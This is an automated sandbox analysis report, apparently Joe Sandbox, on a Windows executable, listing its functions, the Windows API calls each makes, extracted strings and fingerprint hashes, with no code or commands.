                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                                                • Instruction ID: 0ecb0bb5abcd58d92a819266e6137a5066fa5f9c3eda6ca23391faa589e60f0d
                                                • Opcode Fuzzy Hash: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                                                • Instruction Fuzzy Hash: B501D672214701AEDB249B28DC06E67BBA89B447A0F10C92AF51ACA191EA39E501CB90
                                                Function 007949D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                • __lock_file.LIBCMT ref: 00794A16
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2597487223-0
                                                • Opcode ID: a2195f2eff0e4b41dbd50f90602eb3cf748cfa47c96699bc601cef02ff382a26
                                                • Instruction ID: bb0cabfff39aa4b64e8001d6ec2a4c133b805e061003347c722d05fb2b94fba2
                                                • Opcode Fuzzy Hash: a2195f2eff0e4b41dbd50f90602eb3cf748cfa47c96699bc601cef02ff382a26
                                                • Instruction Fuzzy Hash: 48F0AF31950205EBDF51AF74EC0EB9E36A1EF02325F04C514F424AA191DB7C8952DB56
                                                Function 00774FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774FDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: cb3106769eea5a264f69e2970849040a64c9a5e46f3c7120eacb2e956c6252c0
                                                • Instruction ID: e50b36d2ec1797e219bc3c32cb2b828f7554773aaab042a6b33411e07256e435
                                                • Opcode Fuzzy Hash: cb3106769eea5a264f69e2970849040a64c9a5e46f3c7120eacb2e956c6252c0
                                                • Instruction Fuzzy Hash: 30F03971105712CFCF349F74E494822BBE2AF04369329CE3EE1DA82610C739A850DF40
                                                Function 00790911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00790930
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: 0a797a59ca221a0638183b5e0532dbda79cbdb3051eea28ee7f439926632c0f0
                                                • Instruction ID: c96bb59a562dbf5c061295e7e77d36baba5ae7336c89fd42a9efaf0c90aa9a83
                                                • Opcode Fuzzy Hash: 0a797a59ca221a0638183b5e0532dbda79cbdb3051eea28ee7f439926632c0f0
                                                • Instruction Fuzzy Hash: 67E08636A0522897C720D6989C09FFA77EDDF89690F0441B5FC0CD7204D9645C81C690
                                                Function 007D8F48 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction ID: afdb62224a443c59c75524bb2e3fddd768c6c49dae6b4f5e4b77d23a20eee1d4
                                                • Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction Fuzzy Hash: 10E012B1604B009BDB758B24D8517A377E1AB05315F00095DF69AD3341EB67B845CB59
                                                Function 007D349E Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007D339D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,007D34AA,?,?,?,007ADF90,008255C0,00000002,?,?), ref: 007D341B
                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,007ADF90,008255C0,00000002,?,?,?,?), ref: 007D34B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID:
                                                • API String ID: 539440098-0
                                                • Opcode ID: 8b30e4a8eb209d45d8c626c7b013aa39ba9a5b43c226422ff64b6bd5e8d28206
                                                • Instruction ID: 7901ffc9e5876d19a7ad557ab9beb1f66589a3996532fff2443f04bc96728da1
                                                • Opcode Fuzzy Hash: 8b30e4a8eb209d45d8c626c7b013aa39ba9a5b43c226422ff64b6bd5e8d28206
                                                • Instruction Fuzzy Hash: A1E04636400208FBDB20AF94D905FDAB7BCEF04320F00465BF94082110DBB6AE249BA1
                                                Function 00775DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,007AE09B,?,?,00000000), ref: 00775DBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 52ac02037b256388738680abd102de84a88f3f1252960504f7a91d23dc3a7383
                                                • Instruction ID: bdba75955cf4b729fa2700b0156a836cba8f65e270e8423260e18e47129c874a
                                                • Opcode Fuzzy Hash: 52ac02037b256388738680abd102de84a88f3f1252960504f7a91d23dc3a7383
                                                • Instruction Fuzzy Hash: 4FD0C77464020CBFE710DB80DC46FAD777CDB05710F100195FD0456390D6B27D508795
                                                Function 007953CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction ID: fe0b7ed47a877b8b285810205fa42e44a0156fd85e84d358d5755067fda8220c
                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction Fuzzy Hash: A3B0927644020CB7CE022A82FC02A493B599B407A8F408020FB0C181A2A6B7A6649689
                                                Function 007DD107 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 007DD28B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                • Opcode ID: f1924a885d39a7d0494e1f8a475db92198a9ee6a9c57f02fe08ff3b8fec2bbb5
                                                • Instruction ID: 4c9ccedf70ea23fada0d57be30c2d25e812a0d4936dc06c05494219e0a0af170
                                                • Opcode Fuzzy Hash: f1924a885d39a7d0494e1f8a475db92198a9ee6a9c57f02fe08ff3b8fec2bbb5
                                                • Instruction Fuzzy Hash: 1B713C30604301CFCB14EF24C595A6AB7F4AF88754F04896DF59A9B3A1DB78ED09CB52
                                                Function 00775DCF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,?,00775921,?,00776C37), ref: 00775DEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: d9d2092d565d0527e3d13b808e38e134390a493ac4f073bfe35b574d351e10cd
                                                • Instruction ID: 191b5e83c2f2f363ecd6cd597246dbd69d0447df749ef054c242a62d03742422
                                                • Opcode Fuzzy Hash: d9d2092d565d0527e3d13b808e38e134390a493ac4f073bfe35b574d351e10cd
                                                • Instruction Fuzzy Hash: 68E0B679500B01CFD7314F1AE848422FBF5FFE13A13248A2FD4EA82660D7B5589ACB50

                                                Non-executed Functions

                                                Function 007FCB26 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FCBA1
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FCBFF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FCC40
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FCC6A
                                                • SendMessageW.USER32 ref: 007FCC93
                                                • _wcsncpy.LIBCMT ref: 007FCCFF
                                                • GetKeyState.USER32(00000011), ref: 007FCD20
                                                • GetKeyState.USER32(00000009), ref: 007FCD2D
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FCD43
                                                • GetKeyState.USER32(00000010), ref: 007FCD4D
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FCD76
                                                • SendMessageW.USER32 ref: 007FCD9D
                                                • SendMessageW.USER32(?,00001030,?,007FB37C), ref: 007FCEA1
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FCEB7
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FCECA
                                                • SetCapture.USER32(?), ref: 007FCED3
                                                • ClientToScreen.USER32(?,?), ref: 007FCF38
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FCF45
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FCF5F
                                                • ReleaseCapture.USER32 ref: 007FCF6A
                                                • GetCursorPos.USER32(?), ref: 007FCFA4
                                                • ScreenToClient.USER32(?,?), ref: 007FCFB1
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD00D
                                                • SendMessageW.USER32 ref: 007FD03B
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD078
                                                • SendMessageW.USER32 ref: 007FD0A7
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD0C8
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD0D7
                                                • GetCursorPos.USER32(?), ref: 007FD0F7
                                                • ScreenToClient.USER32(?,?), ref: 007FD104
                                                • GetParent.USER32(?), ref: 007FD124
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD18D
                                                • SendMessageW.USER32 ref: 007FD1BE
                                                • ClientToScreen.USER32(?,?), ref: 007FD21C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD24C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD276
                                                • SendMessageW.USER32 ref: 007FD299
                                                • ClientToScreen.USER32(?,?), ref: 007FD2EB
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD31F
                                                  • Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FD3BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3977979337-4164748364
                                                • Opcode ID: 652b068d63b40d37abe8c82a596e15209bb1483b3986007b5201ae91e6a66e6d
                                                • Instruction ID: 15b90cb2d32bfea86e44f643c03c7ec0b756fbfc9498e1974d1b336d99d664c8
                                                • Opcode Fuzzy Hash: 652b068d63b40d37abe8c82a596e15209bb1483b3986007b5201ae91e6a66e6d
                                                • Instruction Fuzzy Hash: FB42BC74204209EFDB22CF24C948ABABBE5FF49310F144969F655D73A1CB3AD854CB92
                                                Function 007870FE Relevance: 50.5, APIs: 19, Strings: 7, Instructions: 5018COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$_memset
                                                • String ID: DEFINE$Oax$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                • API String ID: 1357608183-3856524260
                                                • Opcode ID: 6289f890ddaa61052faa27b37d54f22f6f0d78432c660b40f291395b453511b4
                                                • Instruction ID: 275ef372e708f029275159a1532bd8a48382300db9a45df57da695f89a0af096
                                                • Opcode Fuzzy Hash: 6289f890ddaa61052faa27b37d54f22f6f0d78432c660b40f291395b453511b4
                                                • Instruction Fuzzy Hash: D593B471A40219DFDB28DF58D881BADB7B1FF48710F24816EE945EB281E7789E81CB50
                                                Function 00774A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00774A3D
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007AD9BE
                                                • IsIconic.USER32(?), ref: 007AD9C7
                                                • ShowWindow.USER32(?,00000009), ref: 007AD9D4
                                                • SetForegroundWindow.USER32(?), ref: 007AD9DE
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007AD9F4
                                                • GetCurrentThreadId.KERNEL32 ref: 007AD9FB
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007ADA07
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ADA18
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ADA20
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 007ADA28
                                                • SetForegroundWindow.USER32(?), ref: 007ADA2B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA40
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA4B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA55
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA5A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA63
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA68
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA72
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA77
                                                • SetForegroundWindow.USER32(?), ref: 007ADA7A
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 007ADAA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: c9a38f642eb8a302132ab8afb75d8cc842c543f085e0b5199f5acd065ee461ec
                                                • Instruction ID: 7f78e0d878c6931af9dbc1050af3f31230bfa815d56e392bb4e0a25fa3a3b6a6
                                                • Opcode Fuzzy Hash: c9a38f642eb8a302132ab8afb75d8cc842c543f085e0b5199f5acd065ee461ec
                                                • Instruction Fuzzy Hash: 8D315271A40318BAEB306F619C49F7F7F6CEF85B50F108025FA05EA1D0CAB45D11EAA5
                                                Function 007C8638 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007C8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C8AED
                                                  • Part of subcall function 007C8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8B1A
                                                  • Part of subcall function 007C8AA3: GetLastError.KERNEL32 ref: 007C8B27
                                                • _memset.LIBCMT ref: 007C867B
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C86CD
                                                • CloseHandle.KERNEL32(?), ref: 007C86DE
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C86F5
                                                • GetProcessWindowStation.USER32 ref: 007C870E
                                                • SetProcessWindowStation.USER32(00000000), ref: 007C8718
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C8732
                                                  • Part of subcall function 007C84F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8631), ref: 007C8508
                                                  • Part of subcall function 007C84F3: CloseHandle.KERNEL32(?,?,007C8631), ref: 007C851A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: af99ed2467575c33275e7f7e5cdde80bcd16eb8742beb3d60799aeebcc6d30aa
                                                • Instruction ID: 3d79076110e901b193f6433662df9a0595085cfcbbb5044f779045813ae3235d
                                                • Opcode Fuzzy Hash: af99ed2467575c33275e7f7e5cdde80bcd16eb8742beb3d60799aeebcc6d30aa
                                                • Instruction Fuzzy Hash: D0817771810209AFDF519FA4DC49EEEBBB8EF04304F44816DF914A6261DF398E14DB62
                                                Function 007E407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(007FF910), ref: 007E40A6
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 007E40B4
                                                • GetClipboardData.USER32(0000000D), ref: 007E40BC
                                                • CloseClipboard.USER32 ref: 007E40C8
                                                • GlobalLock.KERNEL32(00000000), ref: 007E40E4
                                                • CloseClipboard.USER32 ref: 007E40EE
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E4103
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 007E4110
                                                • GetClipboardData.USER32(00000001), ref: 007E4118
                                                • GlobalLock.KERNEL32(00000000), ref: 007E4125
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E4159
                                                • CloseClipboard.USER32 ref: 007E4269
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: 8479e9782c135c6e51d769f8b5aaf3623a9f5a3f0c96005f4f504e7e03fac2ca
                                                • Instruction ID: c6f4b1d3a4464ed56b2af925c7f77315808fddd08c36143f9660fe201329fd0a
                                                • Opcode Fuzzy Hash: 8479e9782c135c6e51d769f8b5aaf3623a9f5a3f0c96005f4f504e7e03fac2ca
                                                • Instruction Fuzzy Hash: 9D51BE35204346ABD710EF21DC89F7E77A8AF88B01F008529F64AD21A1DF78D904CB6A
                                                Function 007DC7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                Download Yara Rule
                                                APIs
